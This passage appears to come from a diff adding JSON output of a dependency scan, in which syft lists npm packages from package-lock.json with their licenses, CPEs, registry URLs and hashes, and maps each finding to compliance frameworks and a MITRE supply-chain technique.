Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "574980068e294acc", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: @img/sharp-win32-ia32 0.34.5", + "title": "@img/sharp-win32-ia32 0.34.5", + "description": "Package discovered: @img/sharp-win32-ia32 0.34.5", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "8da96e6bc654731f", + "name": "@img/sharp-win32-ia32", + "version": "0.34.5", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "Apache-2.0 AND LGPL-3.0-or-later", + "spdxExpression": "Apache-2.0 AND LGPL-3.0-or-later", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:\\@img\\/sharp-win32-ia32:\\@img\\/sharp-win32-ia32:0.34.5:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@img\\/sharp-win32-ia32:\\@img\\/sharp_win32_ia32:0.34.5:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@img\\/sharp_win32_ia32:\\@img\\/sharp-win32-ia32:0.34.5:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@img\\/sharp_win32_ia32:\\@img\\/sharp_win32_ia32:0.34.5:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@img\\/sharp-win32:\\@img\\/sharp-win32-ia32:0.34.5:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@img\\/sharp-win32:\\@img\\/sharp_win32_ia32:0.34.5:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@img\\/sharp_win32:\\@img\\/sharp-win32-ia32:0.34.5:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@img\\/sharp_win32:\\@img\\/sharp_win32_ia32:0.34.5:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@img\\/sharp:\\@img\\/sharp-win32-ia32:0.34.5:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@img\\/sharp:\\@img\\/sharp_win32_ia32:0.34.5:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/%40img/sharp-win32-ia32@0.34.5", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/@img/sharp-win32-ia32/-/sharp-win32-ia32-0.34.5.tgz", + "integrity": "sha512-FV9m/7NmeCmSHDD5j4+4pNI8Cp3aW+JvLoXcTUo0IqyjSfAZJ8dIUmijx1qaJsIiU+Hosw6xM5KijAWRJCSgNg==", + "dependencies": null + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "ab5d55aa7d2a17c8", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: @img/sharp-win32-x64 0.34.5", + "title": "@img/sharp-win32-x64 0.34.5", + "description": "Package discovered: @img/sharp-win32-x64 0.34.5", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "e8052476c35410ff", + "name": "@img/sharp-win32-x64", + "version": "0.34.5", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "Apache-2.0 AND LGPL-3.0-or-later", + "spdxExpression": "Apache-2.0 AND LGPL-3.0-or-later", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:\\@img\\/sharp-win32-x64:\\@img\\/sharp-win32-x64:0.34.5:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@img\\/sharp-win32-x64:\\@img\\/sharp_win32_x64:0.34.5:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@img\\/sharp_win32_x64:\\@img\\/sharp-win32-x64:0.34.5:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@img\\/sharp_win32_x64:\\@img\\/sharp_win32_x64:0.34.5:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@img\\/sharp-win32:\\@img\\/sharp-win32-x64:0.34.5:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@img\\/sharp-win32:\\@img\\/sharp_win32_x64:0.34.5:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@img\\/sharp_win32:\\@img\\/sharp-win32-x64:0.34.5:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@img\\/sharp_win32:\\@img\\/sharp_win32_x64:0.34.5:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@img\\/sharp:\\@img\\/sharp-win32-x64:0.34.5:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@img\\/sharp:\\@img\\/sharp_win32_x64:0.34.5:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/%40img/sharp-win32-x64@0.34.5", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/@img/sharp-win32-x64/-/sharp-win32-x64-0.34.5.tgz", + "integrity": "sha512-+29YMsqY2/9eFEiW93eqWnuLcWcufowXewwSNIT6UwZdUUCrM3oFjMWH/Z6/TMmb4hlFenmfAVbpWeup2jryCw==", + "dependencies": null + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "ab76bfe90efb399f", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: @ioredis/commands 1.5.1", + "title": "@ioredis/commands 1.5.1", + "description": "Package discovered: @ioredis/commands 1.5.1", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "58cb7ee4da366532", + "name": "@ioredis/commands", + "version": "1.5.1", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:\\@ioredis\\/commands:\\@ioredis\\/commands:1.5.1:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/%40ioredis/commands@1.5.1", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/@ioredis/commands/-/commands-1.5.1.tgz", + "integrity": "sha512-JH8ZL/ywcJyR9MmJ5BNqZllXNZQqQbnVZOqpPQqE1vHiFgAw4NHbvE0FOduNU8IX9babitBT46571OnPTT0Zcw==", + "dependencies": null + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "2bd603d91182e49c", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: @isaacs/cliui 8.0.2", + "title": "@isaacs/cliui 8.0.2", + "description": "Package discovered: @isaacs/cliui 8.0.2", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "1157d16cad8b2ffc", + "name": "@isaacs/cliui", + "version": "8.0.2", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "ISC", + "spdxExpression": "ISC", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:\\@isaacs\\/cliui:\\@isaacs\\/cliui:8.0.2:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/%40isaacs/cliui@8.0.2", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/@isaacs/cliui/-/cliui-8.0.2.tgz", + "integrity": "sha512-O8jcjabXaleOG9DQ0+ARXWZBTfnP4WNAqzuiJK7ll44AmxGKv/J2M4TPjxjY3znBCfvBXFzucm1twdyFybFqEA==", + "dependencies": { + "string-width": "^5.1.2", + "string-width-cjs": "npm:string-width@^4.2.0", + "strip-ansi": "^7.0.1", + "strip-ansi-cjs": "npm:strip-ansi@^6.0.1", + "wrap-ansi": "^8.1.0", + "wrap-ansi-cjs": "npm:wrap-ansi@^7.0.0" + } + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "5c9bb2e998c9fa3b", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: @jridgewell/gen-mapping 0.3.13", + "title": "@jridgewell/gen-mapping 0.3.13", + "description": "Package discovered: @jridgewell/gen-mapping 0.3.13", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "93582717df76767f", + "name": "@jridgewell/gen-mapping", + "version": "0.3.13", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:\\@jridgewell\\/gen-mapping:\\@jridgewell\\/gen-mapping:0.3.13:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@jridgewell\\/gen-mapping:\\@jridgewell\\/gen_mapping:0.3.13:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@jridgewell\\/gen_mapping:\\@jridgewell\\/gen-mapping:0.3.13:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@jridgewell\\/gen_mapping:\\@jridgewell\\/gen_mapping:0.3.13:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@jridgewell\\/gen:\\@jridgewell\\/gen-mapping:0.3.13:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@jridgewell\\/gen:\\@jridgewell\\/gen_mapping:0.3.13:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/%40jridgewell/gen-mapping@0.3.13", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/@jridgewell/gen-mapping/-/gen-mapping-0.3.13.tgz", + "integrity": "sha512-2kkt/7niJ6MgEPxF0bYdQ6etZaA+fQvDcLKckhy1yIQOzaoKjBBjSj63/aLVjYE3qhRt5dvM+uUyfCg6UKCBbA==", + "dependencies": { + "@jridgewell/sourcemap-codec": "^1.5.0", + "@jridgewell/trace-mapping": "^0.3.24" + } + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "843924b3be64bc5f", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: @jridgewell/resolve-uri 3.1.2", + "title": "@jridgewell/resolve-uri 3.1.2", + "description": "Package discovered: @jridgewell/resolve-uri 3.1.2", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "82452eb5459f3fba", + "name": "@jridgewell/resolve-uri", + "version": "3.1.2", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:\\@jridgewell\\/resolve-uri:\\@jridgewell\\/resolve-uri:3.1.2:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@jridgewell\\/resolve-uri:\\@jridgewell\\/resolve_uri:3.1.2:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@jridgewell\\/resolve_uri:\\@jridgewell\\/resolve-uri:3.1.2:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@jridgewell\\/resolve_uri:\\@jridgewell\\/resolve_uri:3.1.2:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@jridgewell\\/resolve:\\@jridgewell\\/resolve-uri:3.1.2:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@jridgewell\\/resolve:\\@jridgewell\\/resolve_uri:3.1.2:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/%40jridgewell/resolve-uri@3.1.2", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/@jridgewell/resolve-uri/-/resolve-uri-3.1.2.tgz", + "integrity": "sha512-bRISgCIjP20/tbWSPWMEi54QVPRZExkuD9lJL+UIxUKtwVJA8wW1Trb1jMs1RFXo1CBTNZ/5hpC9QvmKWdopKw==", + "dependencies": null + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "c541a28057efb07d", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: @jridgewell/sourcemap-codec 1.5.5", + "title": "@jridgewell/sourcemap-codec 1.5.5", + "description": "Package discovered: @jridgewell/sourcemap-codec 1.5.5", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "47804e8101ff9015", + "name": "@jridgewell/sourcemap-codec", + "version": "1.5.5", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:\\@jridgewell\\/sourcemap-codec:\\@jridgewell\\/sourcemap-codec:1.5.5:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@jridgewell\\/sourcemap-codec:\\@jridgewell\\/sourcemap_codec:1.5.5:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@jridgewell\\/sourcemap_codec:\\@jridgewell\\/sourcemap-codec:1.5.5:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@jridgewell\\/sourcemap_codec:\\@jridgewell\\/sourcemap_codec:1.5.5:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@jridgewell\\/sourcemap:\\@jridgewell\\/sourcemap-codec:1.5.5:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@jridgewell\\/sourcemap:\\@jridgewell\\/sourcemap_codec:1.5.5:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/%40jridgewell/sourcemap-codec@1.5.5", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/@jridgewell/sourcemap-codec/-/sourcemap-codec-1.5.5.tgz", + "integrity": "sha512-cYQ9310grqxueWbl+WuIUIaiUaDcj7WOq5fVhEljNVgRfOUhY9fy2zTvfoqWsnebh8Sl70VScFbICvJnLKB0Og==", + "dependencies": null + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": 